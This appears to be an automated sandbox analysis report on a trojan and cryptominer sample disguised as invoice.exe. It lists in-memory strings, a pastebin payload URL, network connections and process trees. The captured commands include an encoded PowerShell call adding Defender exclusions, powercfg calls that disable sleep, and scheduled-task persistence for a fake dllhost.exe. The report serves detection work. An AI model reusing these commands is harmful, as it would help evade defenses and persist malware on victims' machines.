                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/primer-primitives-4cf0d59ab51a.css
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/primer-react-css.8570b2718b0a9c0c8387.module.css
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/react-lib-7b7b5264f6c1.js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/sessions-f3ddee0032e4.js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/site-6a145c5564e7.css
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_onfocus_onfocus_ts-ui_packages_trusted-types-poli
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-1672e119bd73.js
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-a2
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-a2009221d1
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-po
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_hotkey_dist_index_js-node_modules
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_session-resume_dist_index_js-node
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-85
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_anchored-posit
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038b
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-b0
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-no
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_node_modules_primer_octicon
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/wp-runtime-bfe1537bfda1.js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.png
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
                  Source: powershell.exe, 00000012.00000002.1771702120.000000000562A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1771702120.00000000057A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000012.00000002.1774355211.0000000005EAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://partner.github.com
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006971000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmp, logs.uce.15.dr, logs.uce1.15.dr, logs.uce0.15.drString found in binary or memory: https://pastebin.com/raw/PTNbBX9V
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resources.github.com
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resources.github.com/learn/pathways
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skills.github.com
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://user-images.githubusercontent.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49739 version: TLS 1.2

                  System Summary

                  barindex
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: invoice.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 288
                  Source: invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@38/23@2/3
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMutant created: \Sessions\1\BaseNamedObjects\ProgramV3
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4520
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5744
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                  Source: C:\Users\user\Desktop\invoice.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.bat" "
                  Source: invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\invoice.exeFile read: C:\Windows\win.iniJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: invoice.exeReversingLabs: Detection: 60%
                  Source: C:\Users\user\Desktop\invoice.exeFile read: C:\Users\user\Desktop\invoice.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\invoice.exe "C:\Users\user\Desktop\invoice.exe"
                  Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c dir /b "*.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe "4usfliof.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe "yee9mbi69cm7.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 288
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 224
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.bat" "Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c dir /b "*.exe"Jump to behavior
